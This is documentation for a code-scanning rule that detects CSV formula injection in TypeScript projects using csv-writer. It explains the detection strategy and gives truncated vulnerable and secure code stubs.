Description

This detector identifies CSV injection vulnerabilities in TypeScript code when using CSV writer libraries. CSV injection occurs when untrusted user input is written directly to CSV files without proper sanitization, allowing attackers to inject formulas or commands that could be executed when the CSV is opened in spreadsheet applications.

Detection Strategy

• Scans TypeScript code for CSV writer library usage and method calls

• Identifies when user-controlled data or variables are passed directly to CSV writing functions without validation or sanitization

• Triggers when potentially dangerous content (like formulas starting with =, +, -, @) could be written to CSV files

• Reports vulnerabilities when CSV writer methods receive unsanitized input that could contain malicious spreadsheet formulas or commands

Vulnerable code example

import { Request } from 'express';
import { createObjectCsvWriter } from 'csv-writer';

const csvWriter = createObjectCsvWriter({
  path: 'output.csv',
  header: [{ id: 'data', title: 'DATA' }]
});
...

✅ Secure code example

import { Request } from 'express';
import { createObjectCsvWriter } from 'csv-writer';

const csvWriter = createObjectCsvWriter({
  path: 'output.csv',
  header: [{ id: 'data', title: 'DATA' }]
});
...